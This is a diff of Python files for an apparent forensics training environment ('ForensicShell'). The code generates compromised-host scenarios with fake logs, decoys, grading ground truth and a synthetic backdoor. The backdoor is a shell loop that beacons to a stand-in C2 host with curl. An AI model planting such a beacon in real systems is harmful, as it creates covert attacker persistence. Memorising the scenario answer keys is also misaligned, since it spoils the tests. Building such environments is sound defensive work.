# even though real incidents exist.
|
| 10 |
+
USERNAMES = [
|
| 11 |
+
"alice", "bob", "carol", "dave", "eve", "frank", "grace", "heidi",
|
| 12 |
+
"ivan", "judy", "ken", "leo", "mia", "noah", "olivia", "peter",
|
| 13 |
+
"quinn", "ruby", "sam", "tina", "ursula", "vince", "wendy", "xander",
|
| 14 |
+
"yara", "zach", "maya", "theo", "lara", "jonas",
|
| 15 |
+
"devops", "deploy", "ci", "jenkins", "dbuser", "webops", "svc-nginx",
|
| 16 |
+
"releng", "admin2", "ops",
|
| 17 |
+
]
|
| 18 |
+
|
| 19 |
+
# Decoy (benign) user accounts used to populate /etc/passwd and /home.
|
| 20 |
+
DECOY_USERS = [
|
| 21 |
+
"guest", "backup", "mail", "www-data", "postfix", "systemd-network",
|
| 22 |
+
]
|
| 23 |
+
|
| 24 |
+
HOSTNAMES = [
|
| 25 |
+
"webhost", "db01", "api-gateway", "worker-03", "cache-redis",
|
| 26 |
+
"staging", "bastion", "ingest", "ci-runner", "monitoring",
|
| 27 |
+
"edge-01", "payments", "search-indexer", "log-agg", "auth-svc",
|
| 28 |
+
]
|
| 29 |
+
|
| 30 |
+
# RFC 5737 "documentation" ranges — safe to use, never routable.
|
| 31 |
+
PUBLIC_CIDRS = [
|
| 32 |
+
"192.0.2.", # TEST-NET-1
|
| 33 |
+
"198.51.100.", # TEST-NET-2
|
| 34 |
+
"203.0.113.", # TEST-NET-3
|
| 35 |
+
]
|
| 36 |
+
|
| 37 |
+
# RFC 1918 private space — used for legit internal traffic noise.
|
| 38 |
+
INTERNAL_CIDRS = [
|
| 39 |
+
"10.0.0.",
|
| 40 |
+
"10.0.1.",
|
| 41 |
+
"172.16.0.",
|
| 42 |
+
"192.168.1.",
|
| 43 |
+
]
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def sample_public_ip(rng) -> str:
    """Draw an attacker-looking address: a PUBLIC_CIDRS prefix plus a host octet in 2..254."""
    prefix = rng.choice(PUBLIC_CIDRS)
    host_octet = rng.randint(2, 254)
    return f"{prefix}{host_octet}"
|
| 49 |
+
|
| 50 |
+
|
| 51 |
+
def sample_internal_ip(rng) -> str:
    """Draw a legit-looking address: an INTERNAL_CIDRS prefix plus a host octet in 2..254."""
    prefix = rng.choice(INTERNAL_CIDRS)
    host_octet = rng.randint(2, 254)
    return f"{prefix}{host_octet}"
|
| 54 |
+
|
| 55 |
+
|
| 56 |
+
def sample_username(rng, exclude=()) -> str:
    """Pick one name from USERNAMES, skipping every entry contained in ``exclude``."""
    pool = list(filter(lambda name: name not in exclude, USERNAMES))
    return rng.choice(pool)
|
| 59 |
+
|
| 60 |
+
|
| 61 |
+
def sample_hostname(rng) -> str:
    """Pick one entry from HOSTNAMES using the supplied RNG."""
    chosen = rng.choice(HOSTNAMES)
    return chosen
|
server/scenario_generator.py
ADDED
|
@@ -0,0 +1,315 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Procedural scenario generator for ForensicShell.
|
| 3 |
+
|
| 4 |
+
Pure function of (seed, difficulty, pattern). Identical inputs always produce
|
| 5 |
+
identical scenarios, so seeds work as train/val/test splits and make curricula
|
| 6 |
+
reproducible. No global random state is touched.
|
| 7 |
+
|
| 8 |
+
Public API:
|
| 9 |
+
generate_scenario(seed, difficulty=3, pattern=None) -> dict
|
| 10 |
+
|
| 11 |
+
The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
|
| 12 |
+
scenarios.py — it is a drop-in replacement the env can load through reset().
|
| 13 |
+
|
| 14 |
+
Difficulty tiers:
|
| 15 |
+
1 easy user + ip
|
| 16 |
+
2 medium + modified_files + backdoor_sha256
|
| 17 |
+
3 medium+ same as 2 but more noise
|
| 18 |
+
4 hard + timeline, with red-herring content
|
| 19 |
+
5 hard+ same as 4 with extra red herrings and more complex timeline
|
| 20 |
+
"""
|
| 21 |
+
|
| 22 |
+
from __future__ import annotations
|
| 23 |
+
|
| 24 |
+
import hashlib
|
| 25 |
+
import random
|
| 26 |
+
from datetime import datetime, timedelta
|
| 27 |
+
from types import SimpleNamespace
|
| 28 |
+
from typing import Dict, Optional
|
| 29 |
+
|
| 30 |
+
try:
    from .attack_patterns import PATTERNS
    from .name_pools import (
        DECOY_USERS,
        HOSTNAMES,
        sample_hostname,
        sample_internal_ip,
        sample_public_ip,
        sample_username,
    )
except ImportError:
    # Flat (non-package) layout: forensic_shell_environment.py falls back to
    # `from scenario_generator import generate_scenario`, in which case the
    # relative imports above have no parent package to resolve against.
    from attack_patterns import PATTERNS  # type: ignore
    from name_pools import (  # type: ignore
        DECOY_USERS,
        HOSTNAMES,
        sample_hostname,
        sample_internal_ip,
        sample_public_ip,
        sample_username,
    )
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
# ---------------------------------------------------------------------------
|
| 42 |
+
# Deterministic seed → backdoor bytes
|
| 43 |
+
# ---------------------------------------------------------------------------
|
| 44 |
+
|
| 45 |
+
def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
|
| 46 |
+
"""
|
| 47 |
+
Return (bytes, sha256_hex, short_slug). Byte content is deterministic in
|
| 48 |
+
(seed, pattern) so two generated scenarios with the same seed/pattern have
|
| 49 |
+
the same SHA256 — matches what the grader will compare against.
|
| 50 |
+
"""
|
| 51 |
+
short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]
|
| 52 |
+
header = (
|
| 53 |
+
f"#!/bin/sh\n"
|
| 54 |
+
f"# synthetic payload {pattern}\n"
|
| 55 |
+
f"# seed={seed} slug={short}\n"
|
| 56 |
+
).encode()
|
| 57 |
+
body = (
|
| 58 |
+
f"while :; do\n"
|
| 59 |
+
f" curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n"
|
| 60 |
+
f" sleep 60\n"
|
| 61 |
+
f"done\n"
|
| 62 |
+
).encode()
|
| 63 |
+
payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
|
| 64 |
+
return payload, hashlib.sha256(payload).hexdigest(), short
|
| 65 |
+
|
| 66 |
+
|
| 67 |
+
def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
|
| 68 |
+
"""Where the pattern drops its persistence blob."""
|
| 69 |
+
if pattern_tag == "webshell":
|
| 70 |
+
return f"/var/www/html/.{short}.bin"
|
| 71 |
+
if pattern_tag == "supply_chain":
|
| 72 |
+
return f"/tmp/.{short}"
|
| 73 |
+
if pattern_tag == "insider":
|
| 74 |
+
return "/tmp/.staging/dump.sql"
|
| 75 |
+
if pattern_tag == "ssh_key_theft":
|
| 76 |
+
return f"/usr/local/sbin/.{short}"
|
| 77 |
+
return f"/usr/local/bin/.{short}"
|
| 78 |
+
|
| 79 |
+
|
| 80 |
+
# ---------------------------------------------------------------------------
|
| 81 |
+
# Filesystem + ground-truth assembly
|
| 82 |
+
# ---------------------------------------------------------------------------
|
| 83 |
+
|
| 84 |
+
def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
|
| 85 |
+
"""Render benign, plausible auth log entries to pad the log."""
|
| 86 |
+
out = []
|
| 87 |
+
for i in range(lines):
|
| 88 |
+
ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59))
|
| 89 |
+
who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"])
|
| 90 |
+
internal = "10.0.0." + str(rng.randint(2, 200))
|
| 91 |
+
kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"])
|
| 92 |
+
if kind == "Accepted publickey":
|
| 93 |
+
out.append(
|
| 94 |
+
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
|
| 95 |
+
f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2"
|
| 96 |
+
)
|
| 97 |
+
elif kind == "session opened":
|
| 98 |
+
out.append(
|
| 99 |
+
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
|
| 100 |
+
f"pam_unix(sshd:session): session opened for user {who} by (uid=0)"
|
| 101 |
+
)
|
| 102 |
+
else:
|
| 103 |
+
out.append(
|
| 104 |
+
f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "
|
| 105 |
+
f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user"
|
| 106 |
+
)
|
| 107 |
+
return out
|
| 108 |
+
|
| 109 |
+
|
| 110 |
+
def _passwd_file(main_user: str, rng) -> str:
    """
    Render /etc/passwd-style text: a root entry followed by the decoy accounts
    and ``main_user`` in RNG-shuffled order, with UIDs/GIDs counting up from 1000.
    """
    accounts = [*DECOY_USERS, main_user]
    rng.shuffle(accounts)
    rows = ["root:x:0:0:root:/root:/bin/bash"]
    rows.extend(
        f"{name}:x:{uid}:{uid}:{name.title()},,,:/home/{name}:/bin/bash"
        for uid, name in enumerate(accounts, start=1000)
    )
    return "".join(row + "\n" for row in rows)
|
| 119 |
+
|
| 120 |
+
|
| 121 |
+
def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
    """
    Build decoy filesystem entries for the harder difficulty tiers.

    Always returned: a rotated auth log with a failed probe from an unrelated
    IP, and a decoy user's harmless-but-suspicious-looking bash history.
    With ``intensity >= 2`` two more are added: a junk binary at /tmp/.cache
    and a benign nightly-backup cron file.

    None of the returned paths should end up in ground_truth.modified_files.
    """
    stamp_fmt = "%b %d %H:%M:%S"

    # Draw order is fixed (probe IP, probe port, decoy user, junk seed) so the
    # output is reproducible for a given RNG state.
    probe_ip = sample_public_ip(rng)
    probe_port = rng.randint(30000, 65000)
    probe_at = (ts_base - timedelta(days=1)).strftime(stamp_fmt)
    hangup_at = (ts_base - timedelta(days=1, minutes=-3)).strftime(stamp_fmt)
    rotated_log = (
        f"{probe_at} {host} sshd[101]: Failed password for invalid user admin "
        f"from {probe_ip} port {probe_port} ssh2\n"
        f"{hangup_at} {host} sshd[104]: Received disconnect from {probe_ip}: [preauth]\n"
    )

    bystander = rng.choice(DECOY_USERS)
    bystander_history = "".join(
        cmd + "\n"
        for cmd in (
            "ls -la",
            "sudo systemctl status cron",
            "curl https://api.github.com/users/torvalds",
            "python3 -m http.server 8000 &",
            "pkill -f http.server",
        )
    )

    decoys = {
        "/var/log/auth.log.1": rotated_log,
        f"/home/{bystander}/.bash_history": bystander_history,
    }
    if intensity < 2:
        return decoys

    # Opaque blob an agent might hash and wrongly report as the backdoor.
    decoys["/tmp/.cache"] = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
    # Cron entry that looks suspicious but is routine.
    decoys["/etc/cron.d/backup-nightly"] = (
        "# Nightly backup — owned by ops team\n"
        "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
    )
    return decoys
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
# ---------------------------------------------------------------------------
|
| 166 |
+
# Main public function
|
| 167 |
+
# ---------------------------------------------------------------------------
|
| 168 |
+
|
| 169 |
+
def generate_scenario(
    seed: int,
    difficulty: int = 3,
    pattern: Optional[str] = None,
) -> Dict:
    """
    Deterministic scenario generator.

    All randomness is drawn from a single ``random.Random(int(seed))`` stream,
    so identical ``(seed, difficulty, pattern)`` inputs yield identical
    scenarios. The order of draws below is therefore significant — do not
    reorder the sampling steps.

    Args:
        seed: any integer — identical inputs yield identical scenarios
        difficulty: 1..5 (values outside the range are clamped)
        pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed

    Returns:
        dict with keys: task_id, difficulty, description, filesystem, ground_truth.
        ``ground_truth`` always holds ``compromised_user`` and ``initial_ip``;
        ``modified_files`` and ``backdoor_sha256`` are added at difficulty >= 2,
        and ``timeline`` at difficulty >= 4.

    Raises:
        ValueError: if ``pattern`` is given but is not a key of PATTERNS.
    """
    difficulty = max(1, min(5, difficulty))

    rng = random.Random(int(seed))

    # 1. pick pattern
    if pattern is None:
        pattern = rng.choice(list(PATTERNS.keys()))
    if pattern not in PATTERNS:
        raise ValueError(f"unknown pattern: {pattern}")

    # 2. sample entities
    host = sample_hostname(rng)
    main_user = sample_username(rng)
    if pattern == "insider":
        attacker_ip = sample_internal_ip(rng)
    else:
        attacker_ip = sample_public_ip(rng)

    # 3. base timestamp — always in 2025, deterministic.
    # randint is inclusive on both ends and 2025 has 365 days, so the largest
    # valid offset from Jan 1 is 364 (Dec 31); 365 would land on 2026-01-01.
    day_offset = rng.randint(0, 364)
    hour = rng.randint(8, 22)
    minute = rng.randint(0, 59)
    ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)

    # 4. synthesize backdoor payload
    bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
    bd_path = _backdoor_path_for(pattern, short, main_user)

    ctx = SimpleNamespace(
        rng=rng,
        user=main_user,
        ip=attacker_ip,
        host=host,
        ts_base=ts_base,
        backdoor_bytes=bd_bytes,
        backdoor_sha256=bd_sha,
        backdoor_path=bd_path,
        short=short,
    )

    # 5. run the pattern template
    pattern_fn = PATTERNS[pattern]
    result = pattern_fn(ctx)

    # 6. build filesystem
    noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
    auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"

    filesystem: Dict[str, object] = {
        "/var/log/auth.log": auth_log,
        f"/home/{main_user}/.bash_history": result["bash_history"],
        "/etc/passwd": _passwd_file(main_user, rng),
        "/etc/hostname": f"{host}\n",
        f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
    }
    # add pattern-specific modified files (these may overwrite the defaults)
    filesystem.update(result["modified_files"])

    # 7. red herrings
    if difficulty >= 4:
        intensity = 1 if difficulty == 4 else 2
        herrings = _red_herrings(rng, host, ts_base, intensity)
        for path, content in herrings.items():
            # setdefault: never overwrite a real artifact
            filesystem.setdefault(path, content)

    # 8. path-collision sanity check (duplicate keys impossible in a dict, but
    #    ensure every ground-truth path actually exists in the filesystem)
    for p in result["modified_paths"]:
        assert p in filesystem, f"ground-truth path not in filesystem: {p}"

    # 9. assemble ground truth by difficulty tier
    gt: Dict = {
        "compromised_user": main_user,
        "initial_ip": attacker_ip,
    }
    if difficulty >= 2:
        gt["modified_files"] = list(result["modified_paths"])
        gt["backdoor_sha256"] = bd_sha
    if difficulty >= 4:
        gt["timeline"] = list(result["timeline"])

    task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}"

    description = _describe(difficulty, pattern, main_user, host)

    return {
        "task_id": task_id,
        "difficulty": _difficulty_label(difficulty),
        "description": description,
        "filesystem": filesystem,
        "ground_truth": gt,
    }
|
| 283 |
+
|
| 284 |
+
|
| 285 |
+
# ---------------------------------------------------------------------------
|
| 286 |
+
# Small helpers
|
| 287 |
+
# ---------------------------------------------------------------------------
|
| 288 |
+
|
| 289 |
+
def _difficulty_label(d: int) -> str:
|
| 290 |
+
return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium")
|
| 291 |
+
|
| 292 |
+
|
| 293 |
+
def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
|
| 294 |
+
base = (
|
| 295 |
+
f"Host '{host}' was compromised. Investigate the filesystem to determine "
|
| 296 |
+
f"what happened. Start by reading /var/log/auth.log and the shell histories "
|
| 297 |
+
f"under /home."
|
| 298 |
+
)
|
| 299 |
+
if difficulty == 1:
|
| 300 |
+
return (
|
| 301 |
+
f"{base} Report: compromised_user and initial_ip only. "
|
| 302 |
+
f"(Pattern: {pattern})"
|
| 303 |
+
)
|
| 304 |
+
if difficulty in (2, 3):
|
| 305 |
+
return (
|
| 306 |
+
f"{base} Report: compromised_user, initial_ip, modified_files "
|
| 307 |
+
f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. "
|
| 308 |
+
f"(Pattern: {pattern})"
|
| 309 |
+
)
|
| 310 |
+
return (
|
| 311 |
+
f"{base} Report: compromised_user, initial_ip, modified_files, "
|
| 312 |
+
f"backdoor_sha256, AND an ordered kill-chain timeline with phases "
|
| 313 |
+
f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
|
| 314 |
+
f"present. (Pattern: {pattern})"
|
| 315 |
+
)
|